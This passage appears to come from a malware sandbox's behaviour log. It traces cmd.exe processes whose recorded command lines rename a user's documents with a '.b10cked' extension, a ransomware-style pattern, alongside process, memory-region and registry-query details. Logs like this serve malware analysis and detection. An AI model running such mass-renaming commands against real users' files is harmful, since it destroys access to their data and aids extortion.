(_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0136.425] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0136.425] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0136.425] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0136.425] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0136.425] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0136.425] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0136.425] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0136.425] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0136.425] _wcsicmp (_String1="8RVD3E~1.DOC", _String2=".") returned 10 [0136.425] _wcsicmp (_String1="8RVD3E~1.DOC", _String2="..") returned 10 [0136.425] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\8RVD3E~1.DOC" (normalized: "c:\\users\\eebsym5\\docume~1\\8rvd3e~1.doc")) returned 0x20 [0136.425] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xc1d40 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0136.425] SetErrorMode (uMode=0x0) returned 0x0 [0136.425] SetErrorMode (uMode=0x1) returned 0x0 [0136.426] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\8RVD3E~1.DOC", nBufferLength=0x104, lpBuffer=0x2ceb44, lpFilePart=0x2ceb2c | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\8RVD3E~1.DOC", lpFilePart=0x2ceb2c*="8RVD3E~1.DOC") returned 0x26 [0136.426] SetErrorMode (uMode=0x0) returned 0x1 [0136.426] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1" (normalized: "c:\\users\\eebsym5\\docume~1")) returned 0x13 [0136.426] _wcsicmp (_String1="8RVD3E~1.DOC", _String2=".") returned 10 [0136.426] _wcsicmp (_String1="8RVD3E~1.DOC", _String2="..") returned 10 [0136.426] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\8RVD3E~1.DOC" (normalized: "c:\\users\\eebsym5\\docume~1\\8rvd3e~1.doc")) returned 0x20 [0136.426] SetErrorMode (uMode=0x0) returned 0x0 [0136.426] SetErrorMode (uMode=0x1) returned 0x0 [0136.426] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\8RVD3E~1.DOC", nBufferLength=0x104, lpBuffer=0x2cefc0, lpFilePart=0x2ced58 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\8RVD3E~1.DOC", lpFilePart=0x2ced58*="8RVD3E~1.DOC") returned 0x26 [0136.426] SetErrorMode (uMode=0x0) returned 0x1 [0136.426] SetErrorMode (uMode=0x0) returned 0x0 [0136.426] SetErrorMode (uMode=0x1) returned 0x0 [0136.426] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\8rVd3erYRX.docx.b10cked", nBufferLength=0x104, lpBuffer=0x2cf1c8, lpFilePart=0x2ced58 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\8rVd3erYRX.docx.b10cked", lpFilePart=0x2ced58*="8rVd3erYRX.docx.b10cked") returned 0x31 [0136.426] SetErrorMode (uMode=0x0) returned 0x1 [0136.426] SetLastError (dwErrCode=0x0) [0136.426] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\8rVd3erYRX.docx.b10cked" (normalized: "c:\\users\\eebsym5\\docume~1\\8rvd3eryrx.docx.b10cked")) returned 0xffffffff [0136.426] GetLastError () returned 0x2 [0136.426] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\8RVD3E~1.DOC", fInfoLevelId=0x1, lpFindFileData=0x2ce6d4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ce6d4) returned 0xb0f08 [0136.427] FindNextFileW (in: hFindFile=0xb0f08, lpFindFileData=0x2ce6d4 | out: lpFindFileData=0x2ce6d4) returned 0 [0136.427] GetLastError () returned 0x12 [0136.427] FindClose (in: hFindFile=0xb0f08 | out: hFindFile=0xb0f08) returned 1 [0136.428] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\8RVD3E~1.DOC", fInfoLevelId=0x1, lpFindFileData=0xc1ae0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc1ae0) returned 0xb0f08 [0136.428] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\8rVd3erYRX.docx.b10cked", nBufferLength=0x104, lpBuffer=0x2ce96c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\8rVd3erYRX.docx.b10cked", lpFilePart=0x0) returned 0x31 [0136.428] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\8rVd3erYRX.docx", nBufferLength=0x104, lpBuffer=0x2ce96c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\8rVd3erYRX.docx", lpFilePart=0x0) returned 0x29 [0136.428] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\8rVd3erYRX.docx" (normalized: "c:\\users\\eebsym5\\docume~1\\8rvd3eryrx.docx")) returned 0x20 [0136.428] MoveFileExW (lpExistingFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\8rVd3erYRX.docx" (normalized: "c:\\users\\eebsym5\\docume~1\\8rvd3eryrx.docx"), lpNewFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\8rVd3erYRX.docx.b10cked" (normalized: "c:\\users\\eebsym5\\docume~1\\8rvd3eryrx.docx.b10cked"), dwFlags=0x3) returned 1 [0136.430] FindClose (in: hFindFile=0xb0f08 | out: hFindFile=0xb0f08) returned 1 [0136.430] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x2ce920 | out: _Buffer=" 1") returned 9 [0136.430] _get_osfhandle (_FileHandle=1) returned 0x7 [0136.430] GetFileType (hFile=0x7) returned 0x2 [0136.461] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0136.461] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2ce8ac | out: lpMode=0x2ce8ac) returned 1 [0136.462] _get_osfhandle (_FileHandle=1) returned 0x7 [0136.462] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x2ce8e0 | out: lpConsoleScreenBufferInfo=0x2ce8e0) returned 1 [0136.463] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0136.463] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x2ce920 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0136.463] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x2ce904, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x2ce904*=0x1a) returned 1 [0136.465] _get_osfhandle (_FileHandle=1) returned 0x7 [0136.465] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0136.482] _get_osfhandle (_FileHandle=1) returned 0x7 [0136.482] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0136.483] _get_osfhandle (_FileHandle=0) returned 0x3 [0136.483] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0136.484] SetConsoleInputExeNameW () returned 0x1 [0136.484] GetConsoleOutputCP () returned 0x1b5 [0136.484] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0136.484] SetThreadUILanguage (LangId=0x0) returned 0x409 [0136.484] exit (_Code=0) Process: id = "137" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16640" os_pid = "0xbd0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\D2POZD~1.DOC\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\D2poZdDEdi.docx.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 13615 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 13616 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 13617 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 13618 start_va = 0x210000 end_va = 0x30ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 13619 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 13620 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 13621 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 13622 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 13623 start_va = 0x7ffd9000 end_va = 0x7ffd9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" Region: id = 13624 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 13955 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 13956 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 13957 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 13958 start_va = 0xf0000 end_va = 0x1effff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 13959 start_va = 0x420000 end_va = 0x42ffff entry_point = 0x0 region_type = private name = "private_0x0000000000420000" filename = "" Region: id = 13960 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 13961 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 13962 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 13963 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 13964 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 13965 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 13966 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 13967 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 13968 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 13969 start_va = 0x310000 end_va = 0x3d7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000310000" filename = "" Region: id = 13970 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 13971 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 13972 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 13973 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 13974 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 13975 start_va = 0x1f0000 end_va = 0x1f0fff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 13976 start_va = 0x430000 end_va = 0x530fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000430000" filename = "" Region: id = 13977 start_va = 0x540000 end_va = 0x113ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 13978 start_va = 0x1140000 end_va = 0x12a2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001140000" filename = "" Thread: id = 194 os_tid = 0xbcc [0135.970] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x30fab4 | out: lpSystemTimeAsFileTime=0x30fab4*(dwLowDateTime=0x8afa86c0, dwHighDateTime=0x1d440a9)) [0135.970] GetCurrentProcessId () returned 0xbd0 [0135.970] GetCurrentThreadId () returned 0xbcc [0135.970] GetTickCount () returned 0x2b00c [0135.970] QueryPerformanceCounter (in: lpPerformanceCount=0x30faac | out: lpPerformanceCount=0x30faac*=19275935895) returned 1 [0135.971] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0135.971] __set_app_type (_Type=0x1) [0135.971] __p__fmode () returned 0x76b331f4 [0135.971] __p__commode () returned 0x76b331fc [0135.971] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0135.971] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0135.971] GetCurrentThreadId () returned 0xbcc [0135.971] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xbcc) returned 0x38 [0135.971] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0135.971] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0135.971] SetThreadUILanguage (LangId=0x0) returned 0x409 [0135.971] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0135.971] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x30fa44 | out: phkResult=0x30fa44*=0x0) returned 0x2 [0135.972] VirtualQuery (in: lpAddress=0x30fa7b, lpBuffer=0x30fa14, dwLength=0x1c | out: lpBuffer=0x30fa14*(BaseAddress=0x30f000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0135.972] VirtualQuery (in: lpAddress=0x210000, lpBuffer=0x30fa14, dwLength=0x1c | out: lpBuffer=0x30fa14*(BaseAddress=0x210000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0135.972] VirtualQuery (in: lpAddress=0x211000, lpBuffer=0x30fa14, dwLength=0x1c | out: lpBuffer=0x30fa14*(BaseAddress=0x211000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0135.972] VirtualQuery (in: lpAddress=0x213000, lpBuffer=0x30fa14, dwLength=0x1c | out: lpBuffer=0x30fa14*(BaseAddress=0x213000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0135.972] VirtualQuery (in: lpAddress=0x310000, lpBuffer=0x30fa14, dwLength=0x1c | out: lpBuffer=0x30fa14*(BaseAddress=0x310000, AllocationBase=0x310000, AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0135.972] GetConsoleOutputCP () returned 0x1b5 [0135.972] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0135.972] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0135.972] _get_osfhandle (_FileHandle=1) returned 0x7 [0135.972] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0135.972] _get_osfhandle (_FileHandle=1) returned 0x7 [0135.972] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0135.972] _get_osfhandle (_FileHandle=1) returned 0x7 [0135.972] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0135.973] _get_osfhandle (_FileHandle=0) returned 0x3 [0135.973] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0135.973] _get_osfhandle (_FileHandle=0) returned 0x3 [0135.973] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0135.973] GetEnvironmentStringsW () returned 0x100168* [0135.973] FreeEnvironmentStringsW (penv=0x100168) returned 1 [0135.973] GetEnvironmentStringsW () returned 0x100168* [0135.973] FreeEnvironmentStringsW (penv=0x100168) returned 1 [0135.973] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x30e9b4 | out: phkResult=0x30e9b4*=0x40) returned 0x0 [0135.973] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x30e9bc, lpData=0x30e9c0, lpcbData=0x30e9b8*=0x1000 | out: lpType=0x30e9bc*=0x0, lpData=0x30e9c0*=0x90, lpcbData=0x30e9b8*=0x1000) returned 0x2 [0135.973] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x30e9bc, lpData=0x30e9c0, lpcbData=0x30e9b8*=0x1000 | out: lpType=0x30e9bc*=0x4, lpData=0x30e9c0*=0x1, lpcbData=0x30e9b8*=0x4) returned 0x0 [0135.973] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x30e9bc, lpData=0x30e9c0, lpcbData=0x30e9b8*=0x1000 | out: lpType=0x30e9bc*=0x0, lpData=0x30e9c0*=0x1, lpcbData=0x30e9b8*=0x1000) returned 0x2 [0135.973] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x30e9bc, lpData=0x30e9c0, lpcbData=0x30e9b8*=0x1000 | out: lpType=0x30e9bc*=0x4, lpData=0x30e9c0*=0x0, lpcbData=0x30e9b8*=0x4) returned 0x0 [0135.973] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x30e9bc, lpData=0x30e9c0, lpcbData=0x30e9b8*=0x1000 | out: lpType=0x30e9bc*=0x4, lpData=0x30e9c0*=0x40, lpcbData=0x30e9b8*=0x4) returned 0x0 [0135.974] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x30e9bc, lpData=0x30e9c0, lpcbData=0x30e9b8*=0x1000 | out: lpType=0x30e9bc*=0x4, lpData=0x30e9c0*=0x40, lpcbData=0x30e9b8*=0x4) returned 0x0 [0135.974] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x30e9bc, lpData=0x30e9c0, lpcbData=0x30e9b8*=0x1000 | out: lpType=0x30e9bc*=0x0, lpData=0x30e9c0*=0x40, lpcbData=0x30e9b8*=0x1000) returned 0x2 [0135.974] RegCloseKey (hKey=0x40) returned 0x0 [0135.974] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x30e9b4 | out: phkResult=0x30e9b4*=0x40) returned 0x0 [0135.974] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x30e9bc, lpData=0x30e9c0, lpcbData=0x30e9b8*=0x1000 | out: lpType=0x30e9bc*=0x0, lpData=0x30e9c0*=0x40, lpcbData=0x30e9b8*=0x1000) returned 0x2 [0135.974] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x30e9bc, lpData=0x30e9c0, lpcbData=0x30e9b8*=0x1000 | out: lpType=0x30e9bc*=0x4, lpData=0x30e9c0*=0x1, lpcbData=0x30e9b8*=0x4) returned 0x0 [0135.974] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x30e9bc, lpData=0x30e9c0, lpcbData=0x30e9b8*=0x1000 | out: lpType=0x30e9bc*=0x0, lpData=0x30e9c0*=0x1, lpcbData=0x30e9b8*=0x1000) returned 0x2 [0135.974] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x30e9bc, lpData=0x30e9c0, lpcbData=0x30e9b8*=0x1000 | out: lpType=0x30e9bc*=0x4, lpData=0x30e9c0*=0x0, lpcbData=0x30e9b8*=0x4) returned 0x0 [0135.974] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x30e9bc, lpData=0x30e9c0, lpcbData=0x30e9b8*=0x1000 | out: lpType=0x30e9bc*=0x4, lpData=0x30e9c0*=0x9, lpcbData=0x30e9b8*=0x4) returned 0x0 [0135.974] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x30e9bc, lpData=0x30e9c0, lpcbData=0x30e9b8*=0x1000 | out: lpType=0x30e9bc*=0x4, lpData=0x30e9c0*=0x9, lpcbData=0x30e9b8*=0x4) returned 0x0 [0135.974] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x30e9bc, lpData=0x30e9c0, lpcbData=0x30e9b8*=0x1000 | out: lpType=0x30e9bc*=0x0, lpData=0x30e9c0*=0x9, lpcbData=0x30e9b8*=0x1000) returned 0x2 [0135.974] RegCloseKey (hKey=0x40) returned 0x0 [0135.974] time (in: timer=0x0 | out: timer=0x0) returned 0x5b88636a [0135.974] srand (_Seed=0x5b88636a) [0135.974] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\D2POZD~1.DOC\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\D2poZdDEdi.docx.b10cked\"" [0135.974] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\D2POZD~1.DOC\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\D2poZdDEdi.docx.b10cked\"" [0135.974] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0135.974] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1018c8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0135.975] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0135.975] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0135.975] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0135.975] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0135.975] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0135.975] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0135.975] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0135.975] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0135.975] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0135.975] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0135.975] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0135.975] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0135.975] GetEnvironmentStringsW () returned 0x1022b8* [0135.975] FreeEnvironmentStringsW (penv=0x1022b8) returned 1 [0135.975] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0135.975] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0135.975] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0135.975] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0135.975] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0135.975] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0135.975] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0135.975] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0135.975] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0135.975] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0135.975] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x30f780 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0135.975] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x30f780, lpFilePart=0x30f77c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x30f77c*="Desktop") returned 0x18 [0135.975] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0135.976] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x30f4fc | out: lpFindFileData=0x30f4fc) returned 0xffff8 [0135.976] FindClose (in: 